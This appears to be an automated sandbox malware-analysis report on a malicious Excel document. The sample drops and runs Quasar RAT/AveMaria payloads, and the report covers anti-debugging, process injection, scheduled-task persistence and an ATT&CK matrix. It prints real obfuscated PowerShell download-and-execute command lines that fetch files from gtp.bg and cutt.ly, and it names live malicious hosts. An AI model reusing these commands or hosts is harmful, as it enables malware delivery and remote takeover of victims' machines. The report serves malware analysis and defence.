          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Contains functionality to hide a thread from the debuggerShow sources
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000
          Hides threads from debuggersShow sources
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeThread information set: HideFromDebugger
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0058E501 IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0069B53C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_004AABEB GetProcessHeap,HeapFree,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Roaming\sp.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          .NET source code references suspicious native API functionsShow sources
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???uf871???????????ufffd??ufffd?.csReference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
          Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, ???ua8fa?uf866???ufffd???u323bu1377???u24a3?.csReference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\sp.exeMemory written: C:\Users\user\AppData\Roaming\sp.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeMemory written: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeMemory written: unknown base: 400000 value starts with: 4D5A
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: unknown unknown

          Language, Device and Operating System Detection:

          barindex
          Yara detected Obfuscated PowershellShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: C:\Users\user\Documents\pd.bat, type: DROPPED
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0040EA7D cpuid
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: ___crtGetLocaleInfoEx,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_006A23D1 GetSystemTimeAsFileTime,
          Source: C:\Users\user\AppData\Roaming\sp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected Quasar RATShow sources
          Source: Yara matchFile source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents
          Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents

          Remote Access Functionality:

          barindex
          Yara detected Quasar RATShow sources
          Source: Yara matchFile source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation111DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11Input Capture111System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting311Scheduled Task/Job1Access Token Manipulation1Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsNative API11Logon Script (Windows)Process Injection111Scripting311Security Account ManagerSystem Information Discovery136SMB/Windows Admin SharesInput Capture111Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Scheduled Task/Job1Obfuscated Files or Information41NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCommand and Scripting Interpreter13Network Logon ScriptNetwork Logon ScriptSoftware Packing32LSA SecretsSecurity Software Discovery431SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaScheduled Task/Job1Rc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesPowerShell2Startup ItemsStartup ItemsMasquerading1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion15Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection111Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 336545 Sample: spetsifikatsiya.xls Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 106 Malicious sample detected (through community Yara rule) 2->106 108 Multi AV Scanner detection for dropped file 2->108 110 Sigma detected: Scheduled temp file as task from temp location 2->110 112 17 other signatures 2->112 14 EXCEL.EXE 86 29 2->14         started        process3 signatures4 140 Obfuscated command line found 14->140 142 Document exploit detected (process start blacklist hit) 14->142 17 cmd.exe 14->17         started        19 cmd.exe 14->19         started        22 cmd.exe 14->22         started        24 2 other processes 14->24 process5 signatures6 26 powershell.exe 7 17->26         started        114 Obfuscated command line found 19->114 28 powershell.exe 16 10 19->28         started        32 powershell.exe 6 22->32         started        35 powershell.exe 7 24->35         started        37 powershell.exe 7 24->37         started        process7 dnsIp8 39 cmd.exe 26->39         started        100 cutt.ly 172.67.8.238, 443, 49167 CLOUDFLARENETUS United States 28->100 102 37.46.150.139, 49169, 80 IWAYCH Moldova Republic of 28->102 92 C:\Users\user\Documents\pd.bat, ASCII 28->92 dropped 104 Powershell drops PE file 32->104 42 attrib.exe 35->42         started        file9 signatures10 process11 signatures12 128 Obfuscated command line found 39->128 44 cmd.exe 39->44         started        47 cmd.exe 39->47         started        49 mode.com 39->49         started        process13 signatures14 134 Suspicious powershell command line found 44->134 136 Tries to download and execute files (via powershell) 44->136 51 powershell.exe 8 44->51         started        process15 dnsIp16 94 gtp.bg 195.191.149.103, 49170, 49175, 49191 SUPERHOSTING_ASBG Bulgaria 51->94 76 C:\Users\user\AppData\Roaming\sp.exe, PE32 51->76 dropped 55 sp.exe 5 51->55         started        file17 process18 file19 80 C:\Users\user\AppData\Local\...\tmpCF32.tmp, XML 55->80 dropped 82 C:\Users\user\AppData\...\gUuYfpYBjYgU.exe, PE32 55->82 dropped 130 Injects a PE file into a foreign processes 55->130 132 Contains functionality to hide a thread from the debugger 55->132 59 sp.exe 1 18 55->59         started        64 schtasks.exe 55->64         started        66 sp.exe 55->66         started        signatures20 process21 dnsIp22 96 yz.videomarket.eu 185.157.162.81, 1972, 1973, 49171 OBE-EUROPEObenetworkEuropeSE Sweden 59->96 98 gtp.bg 59->98 84 C:\Users\user\...\eyBLwzbrUF1mwXoy.exe, PE32 59->84 dropped 86 C:\Users\user\...\ars4t7gFPGrepVgh.exe, PE32 59->86 dropped 88 C:\Users\user\...\5DVxvgK9jn5gaBl[1].exe, PE32 59->88 dropped 90 C:\Users\user\...\5DVxvgK9jn5gaBl[1].exe, PE32 59->90 dropped 138 Hides threads from debuggers 59->138 68 eyBLwzbrUF1mwXoy.exe 59->68         started        72 ars4t7gFPGrepVgh.exe 59->72         started        file23 signatures24 process25 file26 78 C:\Users\user\AppData\Roaming\JrekdQ.exe, PE32 68->78 dropped 116 Multi AV Scanner detection for dropped file 68->116 118 Detected unpacking (changes PE section rights) 68->118 120 Detected unpacking (overwrites its own PE header) 68->120 122 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 68->122 74 schtasks.exe 68->74         started        124 Machine Learning detection for dropped file 72->124 126 Injects a PE file into a foreign processes 72->126 signatures27 process28

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          spetsifikatsiya.xls14%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\JrekdQ.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe19%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe30%ReversingLabsByteCode-MSIL.Spyware.AveMaria
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe19%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe30%ReversingLabsByteCode-MSIL.Spyware.AveMaria
